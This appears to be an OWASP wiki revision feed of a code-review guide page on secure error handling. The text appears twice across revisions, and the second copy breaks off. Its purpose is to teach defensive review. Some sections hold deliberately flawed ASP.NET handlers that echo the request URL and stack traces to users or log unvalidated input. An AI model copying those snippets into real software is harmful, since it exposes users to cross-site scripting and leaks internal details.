==Vulnerable Patterns for Error Handling==&lt;br /&gt;
&lt;br /&gt;
===Page_Error===&lt;br /&gt;
&lt;br /&gt;
Page_Error is page level handling which is run on the server side.&lt;br /&gt;
Below is an example, but the error information it returns is a little too informative and hence bad practice.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script language=&amp;quot;C#&amp;quot; runat=&amp;quot;server&amp;quot;&amp;gt;&lt;br /&gt;
 void Page_Error(object source, EventArgs e)&lt;br /&gt;
 {&lt;br /&gt;
     string message = &amp;quot;&amp;lt;font color=\&amp;quot;red\&amp;quot;&amp;gt;&amp;quot; + Request.Url.ToString()&lt;br /&gt;
                      + Server.GetLastError().ToString() + &amp;quot;&amp;lt;/font&amp;gt;&amp;quot;;&lt;br /&gt;
     Response.Write(message); // display message&lt;br /&gt;
 }&lt;br /&gt;
 &amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The code in the example above has a number of issues. Firstly, it redisplays the HTTP request to the user in the form of Request.Url.ToString(). Assuming there has been no data validation prior to this point, we are vulnerable to cross-site scripting attacks. Secondly, the error message and stack trace are displayed to the user via Server.GetLastError().ToString(), which divulges internal information regarding the application. &lt;br /&gt;
&lt;br /&gt;
After the Page_Error is called, the Application_Error sub is called.&lt;br /&gt;
&lt;br /&gt;
===Global.asax===&lt;br /&gt;
&lt;br /&gt;
When an error occurs, the Application_Error sub is called. In this method we can log the error and redirect to another page. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;%@ Import Namespace=&amp;quot;System.Diagnostics&amp;quot; %&amp;gt;&lt;br /&gt;
   &amp;lt;script language=&amp;quot;C#&amp;quot; runat=&amp;quot;server&amp;quot;&amp;gt;&lt;br /&gt;
     void Application_Error(Object sender, EventArgs e) {&lt;br /&gt;
          string message = &amp;quot;\n\nURL: http://localhost/&amp;quot; + Request.Path&lt;br /&gt;
                           + &amp;quot;\n\nMESSAGE:\n &amp;quot; + Server.GetLastError().Message&lt;br /&gt;
                           + &amp;quot;\n\nSTACK TRACE:\n&amp;quot; + Server.GetLastError().StackTrace;&lt;br /&gt;
          // Insert into Event Log&lt;br /&gt;
          EventLog log = new EventLog();&lt;br /&gt;
          log.Source = &amp;quot;MyAppLog&amp;quot;; // event source name (illustrative)&lt;br /&gt;
          log.WriteEntry(message, EventLogEntryType.Error);&lt;br /&gt;
          Server.ClearError(); // clear the error before redirecting&lt;br /&gt;
          Response.Redirect(&amp;quot;Error.htm&amp;quot;);&lt;br /&gt;
     }&lt;br /&gt;
 &amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Above is an example of code in Global.asax and the Application_Error method. The error is logged and then the user is redirected. Unvalidated parameters are being logged here in the form of Request.Path. Care must be taken not to log or redisplay unvalidated input from any external source.&lt;br /&gt;
&lt;br /&gt;
===Web.config===&lt;br /&gt;
Web.config has custom error tags which can be used to handle errors. This is called last: if Page_Error or Application_Error is defined and has functionality, that functionality will be executed first. As long as neither of the previous two handling mechanisms redirects or clears the error (Response.Redirect or Server.ClearError), this will be called and the user will be forwarded to the page defined in web.config. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;customErrors defaultRedirect=&amp;quot;error.html&amp;quot; mode=&amp;quot;On|Off|RemoteOnly&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;error statusCode=&amp;quot;statuscode&amp;quot; redirect=&amp;quot;url&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/customErrors&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The &amp;quot;On&amp;quot; directive means that custom errors are enabled. If no defaultRedirect is specified, users see a generic error. The &amp;quot;Off&amp;quot; directive means that custom errors are disabled. This allows the displaying of detailed errors. &amp;quot;RemoteOnly&amp;quot; specifies that custom errors are shown only to remote clients, and ASP.NET errors are shown to the local host. This is the default. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;customErrors mode=&amp;quot;On&amp;quot; defaultRedirect=&amp;quot;error.html&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;500&amp;quot; redirect=&amp;quot;err500.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;404&amp;quot; redirect=&amp;quot;notHere.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;403&amp;quot; redirect=&amp;quot;notAuthz.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/customErrors&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Leading Practice for Error Handling ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Try &amp;amp; Catch (Java/ .NET)===&lt;br /&gt;
Code that might throw exceptions should be in a try block and code that handles exceptions in a catch block. The catch block is a series of statements beginning with the keyword catch, followed by an exception type and an action to be taken. These are very similar in Java and .NET &lt;br /&gt;
&lt;br /&gt;
'''Example:'''&lt;br /&gt;
&lt;br /&gt;
'''.NET (C#) Try-Catch:'''&lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
     public static void Main() {&lt;br /&gt;
         try {&lt;br /&gt;
             StreamReader sr = File.OpenText(&amp;quot;stuff.txt&amp;quot;);&lt;br /&gt;
             Console.WriteLine(&amp;quot;Reading line {0}&amp;quot;, sr.ReadLine());    &lt;br /&gt;
         }&lt;br /&gt;
         catch(Exception e) {&lt;br /&gt;
             Console.WriteLine(&amp;quot;An error occurred. Please leave the room&amp;quot;);&lt;br /&gt;
             logerror(&amp;quot;Error: &amp;quot;, e);&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Java Try-Catch:'''&lt;br /&gt;
&lt;br /&gt;
 public void run() {&lt;br /&gt;
             while (!stop) {&lt;br /&gt;
                 try {&lt;br /&gt;
 &lt;br /&gt;
                     // Perform work here&lt;br /&gt;
 &lt;br /&gt;
                 } catch (Throwable t) {&lt;br /&gt;
                     // Log the exception and continue&lt;br /&gt;
                     WriteToUser(&amp;quot;An error has occurred, put the kettle on&amp;quot;);&lt;br /&gt;
                     logger.log(Level.SEVERE, &amp;quot;Unexpected exception&amp;quot;, t);&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
&lt;br /&gt;
In general, it is best practice to catch a specific type of exception rather than use the basic catch(Exception) or catch(Throwable) statement in the case of Java. &lt;br /&gt;
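The point above can be sketched in Java as follows; the class, method, and file name are illustrative only, not part of any standard API:

```java
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.IOException;

// Catch specific exception types, most specific first, instead of a
// blanket catch(Exception) or catch(Throwable).
public class SpecificCatch {
    public static String classify(String path) {
        try (FileReader reader = new FileReader(path)) {
            return "opened";
        } catch (FileNotFoundException e) {
            return "missing";     // the most specific failure mode
        } catch (IOException e) {
            return "io-error";    // any broader I/O failure
        }
    }
}
```

Note that reversing the two catch blocks would not compile, since FileNotFoundException is a subclass of IOException.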
&lt;br /&gt;
In classic ASP there are two ways to do error handling: the first is using the err object with an On Error Resume Next.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 Public Function IsInteger (ByVal Number)	 &lt;br /&gt;
   Dim Res, tNumber, re&lt;br /&gt;
   Set re = New RegExp                       'regular expression object used in the pattern test below&lt;br /&gt;
   Number = Trim(Number)&lt;br /&gt;
   tNumber=Number		&lt;br /&gt;
   On Error Resume Next	                     'If an error occurs continue execution&lt;br /&gt;
   Number = CInt(Number) 	             'if Number is an alphanumeric string a Type Mismatch error will occur&lt;br /&gt;
   Res = (err.number = 0) 	             'If there are no errors then return true&lt;br /&gt;
   On Error GoTo 0			     'If an error occurs stop execution and display error&lt;br /&gt;
   re.Pattern = &amp;quot;^[\+\-]? *\d+$&amp;quot;	     'only one +/- and digits are allowed&lt;br /&gt;
   IsInteger = re.Test(tNumber) And Res&lt;br /&gt;
 End Function&lt;br /&gt;
 &lt;br /&gt;
The second is using an error handler on an error page (http://support.microsoft.com/kb/299981).&lt;br /&gt;
 &lt;br /&gt;
 Dim ErrObj&lt;br /&gt;
 set ErrObj = Server.GetLastError()&lt;br /&gt;
 'Now use ErrObj as the regular err object&lt;br /&gt;
&lt;br /&gt;
===Releasing resources and good housekeeping===&lt;br /&gt;
If the language in question has a finally block, use it. The finally block is guaranteed to always execute, whether or not an exception is thrown, and can be used to release resources referenced by the method that threw the exception. This is very important. For example, if a method obtained a database connection from a pool and an exception occurred, without finally the connection object would not be returned to the pool until the timeout expired. This can lead to pool exhaustion. &lt;br /&gt;
&lt;br /&gt;
 PrintWriter out = null;&lt;br /&gt;
 try {&lt;br /&gt;
        System.out.println(&amp;quot;Entering try statement&amp;quot;);&lt;br /&gt;
        out = new PrintWriter(new FileWriter(&amp;quot;OutFile.txt&amp;quot;));&lt;br /&gt;
      //Do Stuff….&lt;br /&gt;
 &lt;br /&gt;
    } catch (IOException e) {&lt;br /&gt;
        System.err.println(&amp;quot;Input exception&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
    } catch (Exception e) {&lt;br /&gt;
        System.err.println(&amp;quot;Error occurred!&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
    } finally {&lt;br /&gt;
 &lt;br /&gt;
        if (out != null) {&lt;br /&gt;
            out.close(); // RELEASE RESOURCES&lt;br /&gt;
        }&lt;br /&gt;
    }&lt;br /&gt;
A Java example showing a finally block being used to release system resources. Note that the narrower IOException catch must precede the broader Exception catch, or the code will not compile.&lt;br /&gt;
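Since Java 7, the same housekeeping can also be expressed with try-with-resources, which closes the resource automatically whether the block exits normally or via an exception. This is a minimal sketch; the class and file names are illustrative:

```java
import java.io.IOException;
import java.io.PrintWriter;
import java.nio.file.Files;
import java.nio.file.Path;

// try-with-resources: the PrintWriter is closed automatically when the
// block exits, normally or via an exception, so no finally is needed.
public class AutoRelease {
    public static void writeLine(Path file, String line) throws IOException {
        try (PrintWriter out = new PrintWriter(Files.newBufferedWriter(file))) {
            out.println(line);
        }
    }
}
```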
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
For Classic ASP pages it is recommended to enclose all cleanup code in a function and call it from an error handling statement after an &amp;quot;On Error Resume Next&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
===Centralised exception handling (Struts Example)===&lt;br /&gt;
Building an infrastructure for consistent error reporting proves more difficult than error handling itself. Struts provides the ActionMessages and ActionErrors classes for maintaining a stack of error messages to be reported, which can be used with JSP tags like &amp;lt;html:errors&amp;gt; to display these error messages to the user. &lt;br /&gt;
&lt;br /&gt;
To report a different severity of a message in a different manner (like error, warning, or information) the following tasks are required: &lt;br /&gt;
&lt;br /&gt;
# Register, instantiate the errors under the appropriate severity&lt;br /&gt;
# Identify these messages and show them in a consistent manner.&lt;br /&gt;
&lt;br /&gt;
Struts ActionErrors class makes error handling quite easy:&lt;br /&gt;
&lt;br /&gt;
 ActionErrors errors = new ActionErrors();&lt;br /&gt;
 errors.add(&amp;quot;fatal&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 errors.add(&amp;quot;error&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 errors.add(&amp;quot;warning&amp;quot;, new ActionError(&amp;quot;....&amp;quot;));&lt;br /&gt;
 errors.add(&amp;quot;information&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 saveErrors(request,errors); // Important to do this&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now that we have added the errors, we display them by using tags in the HTML page. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;logic:messagePresent property=&amp;quot;error&amp;quot;&amp;gt; &lt;br /&gt;
 &amp;lt;html:messages property=&amp;quot;error&amp;quot; id=&amp;quot;errMsg&amp;quot; &amp;gt;&lt;br /&gt;
     &amp;lt;bean:write name=&amp;quot;errMsg&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/html:messages&amp;gt;&lt;br /&gt;
 &amp;lt;/logic:messagePresent &amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
For classic ASP pages you need to do some IIS configuration; see http://support.microsoft.com/kb/299981 for more information.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Codereview-Error-Handling&amp;diff=60155</id>
		<title>Codereview-Error-Handling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Codereview-Error-Handling&amp;diff=60155"/>
				<updated>2009-05-05T12:09:37Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* JAVA */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
==Error Handling==&lt;br /&gt;
Error Handling is important in a number of ways. It may affect the state of the application, or leak system information to a user. The initial failure that causes the error may push the application into an insecure state. Weak error handling also aids the attacker, as the errors returned may assist them in constructing correct attack vectors. A generic error page for most errors is recommended when developing code. This approach makes it more difficult for attackers to identify signatures of potentially successful attacks. Keep in mind that some methods can circumvent even systems with leading-practice error handling: attacks such as blind SQL injection, using booleanization or response-time characteristics, can still work against such generic responses. &lt;br /&gt;
&lt;br /&gt;
The other key area relating to error handling is the premise of &amp;quot;fail securely&amp;quot;. Errors induced should not leave the application in an insecure state. Resources should be locked down and released, sessions terminated (if required), and calculations or business logic should be halted (depending on the type of error, of course). &lt;br /&gt;
&lt;br /&gt;
An important aspect of secure application development is to prevent information leakage. Error messages give an attacker great insight into the inner workings of an application. &lt;br /&gt;
&lt;br /&gt;
''The purpose of reviewing the Error Handling code is to assure that the application fails safely under all possible error conditions, expected and unexpected. No sensitive information is presented to the user when an error occurs. ''&lt;br /&gt;
&lt;br /&gt;
For example, SQL injection is much tougher to execute successfully without some helpful error messages. Withholding them lessens the attack footprint, and an attacker would have to resort to using “blind SQL injection”, which is more difficult and time consuming. &lt;br /&gt;
&lt;br /&gt;
A well-planned error/exception handling strategy is important for three reasons:&lt;br /&gt;
&lt;br /&gt;
#	Good error handling does not give the attacker information that serves as a means to an end in attacking the application&lt;br /&gt;
#	A proper centralised error strategy is easier to maintain and reduces the chance of any uncaught errors “Bubbling up” to the front end of an application.&lt;br /&gt;
#	Information leakage can lead to social engineering exploits.&lt;br /&gt;
&lt;br /&gt;
Some development languages provide checked exceptions, which means that the compiler will complain if an exception for a particular API call is not caught; Java is a good example of this. Languages like C++ and C do not provide this safety net. Even languages with checked exception handling are prone to information leakage, as not all types of errors are checked for. &lt;br /&gt;
&lt;br /&gt;
When an exception or error is thrown, we also need to log this occurrence. Sometimes this is due to bad development, but it can be the result of an attack or some other service your application relies on failing. &lt;br /&gt;
&lt;br /&gt;
All code paths that can cause an exception to be thrown should first check for success, so that the exception need not be thrown. &lt;br /&gt;
&lt;br /&gt;
* To avoid a NullPointerException we should check that the object being accessed is not null. &lt;br /&gt;
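A minimal sketch of that check; the class and method names are hypothetical:

```java
// Guard against NullPointerException by checking for null before
// dereferencing; return a harmless default instead of failing.
public class NullGuard {
    public static String safeTrim(String input) {
        if (input == null) {
            return "";        // fail securely with a safe default
        }
        return input.trim();  // safe to dereference here
    }
}
```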
&lt;br /&gt;
===Error Handling Should Be Centralized if Possible===&lt;br /&gt;
&lt;br /&gt;
When reviewing code it is recommended that you assess the commonality within the application from an error/exception handling perspective. Frameworks have error handling resources which can be leveraged to assist in secure programming, and such resources within the framework should be reviewed to assess if the error handling is &amp;quot;wired-up&amp;quot; correctly. &lt;br /&gt;
&lt;br /&gt;
* A generic error page should be used for all exceptions if possible. &lt;br /&gt;
&lt;br /&gt;
This prevents the attacker from identifying internal responses to error states. This also makes it more difficult for automated tools to identify successful attacks.&lt;br /&gt;
&lt;br /&gt;
'''Declarative Exception Handling'''&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;exception   key=&amp;quot;bank.error.nowonga&amp;quot; &lt;br /&gt;
                    path=&amp;quot;/NoWonga.jsp&amp;quot; &lt;br /&gt;
                    type=&amp;quot;mybank.account.NoCashException&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This could be found in the struts-config.xml file, a key file when reviewing the wired-up Struts environment.&lt;br /&gt;
&lt;br /&gt;
===Java Servlets and JSP===&lt;br /&gt;
&lt;br /&gt;
A handler for unhandled exceptions can be specified in web.xml. When an exception occurs but is not caught in code, the user is forwarded to a generic error page: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;error-page&amp;gt;&lt;br /&gt;
       &amp;lt;exception-type&amp;gt;UnhandledException&amp;lt;/exception-type&amp;gt;&lt;br /&gt;
       &amp;lt;location&amp;gt;GenericError.jsp&amp;lt;/location&amp;gt;&lt;br /&gt;
 &amp;lt;/error-page&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Also in the case of HTTP 404 or HTTP 500 errors during the review you may find: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;error-page&amp;gt;&lt;br /&gt;
  &amp;lt;error-code&amp;gt;500&amp;lt;/error-code&amp;gt;&lt;br /&gt;
  &amp;lt;location&amp;gt;GenericError.jsp&amp;lt;/location&amp;gt;&lt;br /&gt;
 &amp;lt;/error-page&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Failing Securely===&lt;br /&gt;
Types of errors:&lt;br /&gt;
*The result of business logic conditions not being met.&lt;br /&gt;
*The result of the environment wherein the business logic resides failing.&lt;br /&gt;
*The result of upstream or downstream systems, upon which the application depends, failing.&lt;br /&gt;
*Technical hardware / physical failure.&lt;br /&gt;
&lt;br /&gt;
Failures are never expected, but they do occur. In the event of a failure, it is important not to leave the &amp;quot;doors&amp;quot; of the application open and the keys to other &amp;quot;rooms&amp;quot; within the application sitting on the table. In the course of a logical workflow, which is designed based upon requirements, errors may occur which can be programmatically handled, such as a connection pool not being available, or a downstream server not being contactable. &lt;br /&gt;
&lt;br /&gt;
Such areas of failure should be examined during the course of the code review. Verify that all resources are released in the case of a failure, and that there is no potential for resource leakage anywhere in the thread of execution; resources include memory, connection pools, file handles, etc. &lt;br /&gt;
&lt;br /&gt;
The review of code should also include pinpointing areas where the user session should be terminated or invalidated. Sometimes errors may occur which do not make any logical sense from a business logic perspective or a technical standpoint; &lt;br /&gt;
&lt;br /&gt;
e.g: &amp;quot;A logged in user looking to access an account which is not registered to that user and such data could not be inputted in the normal fashion.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Such conditions reflect possible malicious activity. Here we should review whether the code is defensive: does it kill the user’s session object and forward the user to the login page? (Keep in mind that the session object should be examined upon every HTTP request.)&lt;br /&gt;
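The defensive pattern described above might be sketched as follows. The session is stubbed with a tiny interface so the example is self-contained; in a real servlet you would call request.getSession(false).invalidate() and forward to the login page:

```java
// Sketch: on an ownership check failure, kill the session and signal
// that the caller should forward the user to the login page.
public class SessionGuard {
    public interface Session { void invalidate(); }

    public static class SimpleSession implements Session {
        public boolean valid = true;
        public void invalidate() { valid = false; }
    }

    public static boolean checkOwnership(String sessionUser,
                                         String accountOwner,
                                         Session session) {
        if (!sessionUser.equals(accountOwner)) {
            session.invalidate();  // possible malicious activity
            return false;          // caller forwards to the login page
        }
        return true;
    }
}
```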
&lt;br /&gt;
===Information Burial===&lt;br /&gt;
Swallowing exceptions in an empty catch block is not advised, as the audit trail of the cause of the exception would be incomplete.&lt;br /&gt;
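A sketch of the alternative, using java.util.logging; the logger name and method are illustrative:

```java
import java.util.logging.Level;
import java.util.logging.Logger;

// Never leave a catch block empty: log the cause so the audit trail
// of the failure is complete before continuing.
public class NoSwallow {
    private static final Logger LOGGER = Logger.getLogger("app.audit");

    public static int parseOrDefault(String value, int fallback) {
        try {
            return Integer.parseInt(value);
        } catch (NumberFormatException e) {
            LOGGER.log(Level.WARNING, "Bad numeric input", e);
            return fallback;
        }
    }
}
```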
&lt;br /&gt;
==Generic Error Messages==&lt;br /&gt;
We should use a localized description string in every exception, a friendly error reason such as “System Error – Please try again later”. When the user sees an error message, it will be derived from this description string of the exception that was thrown, and never from the exception class which may contain a stack trace, line number where the error occurred, class name, or method name. &lt;br /&gt;
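One way to carry such a description string is a custom exception that separates the user-facing text from the technical detail. This is a hypothetical sketch, not a standard API:

```java
// A custom exception holding a friendly, localized message for the user
// while the technical detail is reserved for the log.
public class SystemFault extends Exception {
    private final String userMessage;

    public SystemFault(String userMessage, String technicalDetail) {
        super(technicalDetail);         // goes to the log only
        this.userMessage = userMessage; // safe to show to the user
    }

    public String getUserMessage() {
        return userMessage;             // no stack trace, class or line number
    }
}
```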
&lt;br /&gt;
Do not expose sensitive information in exception messages. Information such as paths on the local file system is considered privileged information; any internal system information should be hidden from the user. As mentioned before, an attacker could use this information to gather private user information from the application or components that make up the app. &lt;br /&gt;
&lt;br /&gt;
Don’t put people’s names or any internal contact information in error messages. Don’t put any “human” information, which would lead to a level of familiarity and a social engineering exploit.&lt;br /&gt;
&lt;br /&gt;
==How to Locate the Potentially Vulnerable Code==&lt;br /&gt;
&lt;br /&gt;
===JAVA===&lt;br /&gt;
In Java we have the concept of an error object: the Exception object. This lives in the Java package java.lang and is derived from the Throwable object. Exceptions are thrown when an abnormal condition occurs. Another object derived from Throwable is the Error object, which is thrown when something more serious occurs. &lt;br /&gt;
&lt;br /&gt;
Information leakage can occur when developers use some exception methods, which ‘bubble’ to the user UI due to a poor error handling strategy. The methods are as follows: &lt;br /&gt;
&lt;br /&gt;
printStackTrace()&amp;lt;br&amp;gt;&lt;br /&gt;
getStackTrace()&lt;br /&gt;
&lt;br /&gt;
It is also important to know that the output of these methods is printed to the system console, the same as System.out.println(e) where e is an Exception. Be sure not to redirect this output to the JSP PrintWriter object (by convention called &amp;quot;out&amp;quot;), e.g. printStackTrace(out). &lt;br /&gt;
&lt;br /&gt;
Another place to look is the java.lang.System class:&lt;br /&gt;
&lt;br /&gt;
setErr() and the System.err field.&lt;br /&gt;
&lt;br /&gt;
===.NET===&lt;br /&gt;
In .NET a System.Exception object exists, and commonly used child objects such as ApplicationException and SystemException derive from it. It is not recommended that you throw or catch a SystemException; this is thrown by the runtime. &lt;br /&gt;
&lt;br /&gt;
When an error occurs, either the system or the currently executing application reports it by throwing an exception containing information about the error, similar to Java. Once thrown, an exception is handled by the application or by the default exception handler. This Exception object contains similar methods to the Java implementation such as: &lt;br /&gt;
&lt;br /&gt;
StackTrace &amp;lt;br&amp;gt;&lt;br /&gt;
Source &amp;lt;br&amp;gt;&lt;br /&gt;
Message &amp;lt;br&amp;gt;&lt;br /&gt;
HelpLink &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In .NET we need to look at the error handling strategy from the point of view of global error handling and the handling of unexpected errors. This can be done in many ways and this article is not an exhaustive list. Firstly, an Error Event is thrown when an unhandled exception is thrown. &lt;br /&gt;
&lt;br /&gt;
This is part of the TemplateControl class. &lt;br /&gt;
&lt;br /&gt;
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemWebUITemplateControlClassErrorTopic.asp&lt;br /&gt;
&lt;br /&gt;
Error handling can be done in three ways in .NET&lt;br /&gt;
&lt;br /&gt;
*In the web.config file's customErrors section. &lt;br /&gt;
*In the global.asax file's Application_Error sub. &lt;br /&gt;
*On the aspx or associated codebehind page in the Page_Error sub&lt;br /&gt;
&lt;br /&gt;
The order of error handling events in .NET is as follows: &lt;br /&gt;
#	On the Page in the Page_Error sub.&lt;br /&gt;
#	The global.asax Application_Error sub &lt;br /&gt;
#	The web.config file &lt;br /&gt;
&lt;br /&gt;
It is recommended to look in these areas to understand the error strategy of the application.&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
Unlike Java and .NET, classic ASP pages do not have structured error handling in try-catch blocks. Instead they have a specific object called &amp;quot;err&amp;quot;. This makes error handling in classic ASP pages hard to do and prone to design errors in error handlers, causing race conditions and information leakage. Also, as ASP uses VBScript (a subset of Visual Basic), statements like &amp;quot;On Error GoTo label&amp;quot; are not available.&lt;br /&gt;
&lt;br /&gt;
==Vulnerable Patterns for Error Handling==&lt;br /&gt;
&lt;br /&gt;
===Page_Error===&lt;br /&gt;
&lt;br /&gt;
Page_Error provides page-level error handling and runs on the server side.&lt;br /&gt;
Below is an example, but the error information it displays is far too informative and hence bad practice.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script language=&amp;quot;VB&amp;quot; runat=&amp;quot;server&amp;quot;&amp;gt;&lt;br /&gt;
 Sub Page_Error(Source As Object, E As EventArgs)&lt;br /&gt;
     Dim message As String = &amp;quot;&amp;lt;font color='red'&amp;gt;&amp;quot; &amp;amp; Request.Url.ToString() &amp;amp; Server.GetLastError().ToString() &amp;amp; &amp;quot;&amp;lt;/font&amp;gt;&amp;quot;&lt;br /&gt;
     Response.Write(message) ' display message&lt;br /&gt;
 End Sub&lt;br /&gt;
  &amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The code in the example above has a number of issues. Firstly, it redisplays the HTTP request to the user in the form of Request.Url.ToString(). Assuming there has been no data validation prior to this point, we are vulnerable to cross-site scripting attacks. Secondly, the error message and stack trace are displayed to the user via Server.GetLastError().ToString(), which divulges internal information regarding the application. &lt;br /&gt;
&lt;br /&gt;
After the Page_Error is called, the Application_Error sub is called.&lt;br /&gt;
&lt;br /&gt;
===Global.asax===&lt;br /&gt;
&lt;br /&gt;
When an error occurs, the Application_Error sub is called. In this method we can log the error and redirect to another page. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;%@ Import Namespace=&amp;quot;System.Diagnostics&amp;quot; %&amp;gt;&lt;br /&gt;
   &amp;lt;script language=&amp;quot;C#&amp;quot; runat=&amp;quot;server&amp;quot;&amp;gt;&lt;br /&gt;
     void Application_Error(Object sender, EventArgs e) {&lt;br /&gt;
          String Message = &amp;quot;\n\nURL: http://localhost/&amp;quot; + Request.Path&lt;br /&gt;
                           + &amp;quot;\n\nMESSAGE:\n &amp;quot; + Server.GetLastError().Message&lt;br /&gt;
                           + &amp;quot;\n\nSTACK TRACE:\n&amp;quot; + Server.GetLastError().StackTrace;&lt;br /&gt;
          // Insert into Event Log&lt;br /&gt;
          EventLog Log = new EventLog();&lt;br /&gt;
          Log.Source = &amp;quot;MyApp&amp;quot;; // event source name (illustrative)&lt;br /&gt;
          Log.WriteEntry(Message, EventLogEntryType.Error);&lt;br /&gt;
          Server.ClearError(); // clear the error so it does not propagate&lt;br /&gt;
          Response.Redirect(&amp;quot;Error.htm&amp;quot;);&lt;br /&gt;
     }&lt;br /&gt;
 &amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Above is an example of code in Global.asax and the Application_Error method. The error is logged and then the user is redirected. Unvalidated parameters are being logged here in the form of Request.Path. Care must be taken not to log or redisplay unvalidated input from any external source.&lt;br /&gt;
&lt;br /&gt;
===Web.config===&lt;br /&gt;
Web.config has a customErrors section which can be used to handle errors. This is called last: if Page_Error or Application_Error is defined and has functionality, that functionality executes first. As long as neither of those handlers redirects or clears the error (Response.Redirect or Server.ClearError), this mechanism is invoked and the user is forwarded to the page defined in web.config. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;customErrors defaultRedirect=&amp;quot;error.html&amp;quot; mode=&amp;quot;On|Off|RemoteOnly&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;error statusCode=&amp;quot;statuscode&amp;quot; redirect=&amp;quot;url&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/customErrors&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The &amp;quot;On&amp;quot; directive means that custom errors are enabled. If no defaultRedirect is specified, users see a generic error. The &amp;quot;Off&amp;quot; directive means that custom errors are disabled. This allows the displaying of detailed errors. &amp;quot;RemoteOnly&amp;quot; specifies that custom errors are shown only to remote clients, and ASP.NET errors are shown to the local host. This is the default. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;customErrors mode=&amp;quot;On&amp;quot; defaultRedirect=&amp;quot;error.html&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;500&amp;quot; redirect=&amp;quot;err500.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;404&amp;quot; redirect=&amp;quot;notHere.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;403&amp;quot; redirect=&amp;quot;notAuthz.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/customErrors&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Leading Practice for Error Handling ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Try &amp;amp; Catch (Java/ .NET)===&lt;br /&gt;
Code that might throw exceptions should be in a try block and code that handles exceptions in a catch block. The catch block is a series of statements beginning with the keyword catch, followed by an exception type and an action to be taken. These are very similar in Java and .NET &lt;br /&gt;
&lt;br /&gt;
'''Example:'''&lt;br /&gt;
&lt;br /&gt;
'''.NET (C#) Try-Catch:'''&lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
     public static void Main() {&lt;br /&gt;
         try {&lt;br /&gt;
             StreamReader sr = File.OpenText(&amp;quot;stuff.txt&amp;quot;);&lt;br /&gt;
             Console.WriteLine(&amp;quot;Reading line {0}&amp;quot;, sr.ReadLine());    &lt;br /&gt;
         }&lt;br /&gt;
         catch(Exception e) {&lt;br /&gt;
             Console.WriteLine(&amp;quot;An error occurred. Please leave the room&amp;quot;);&lt;br /&gt;
             logerror(&amp;quot;Error: &amp;quot;, e);&lt;br /&gt;
         }&lt;br /&gt;
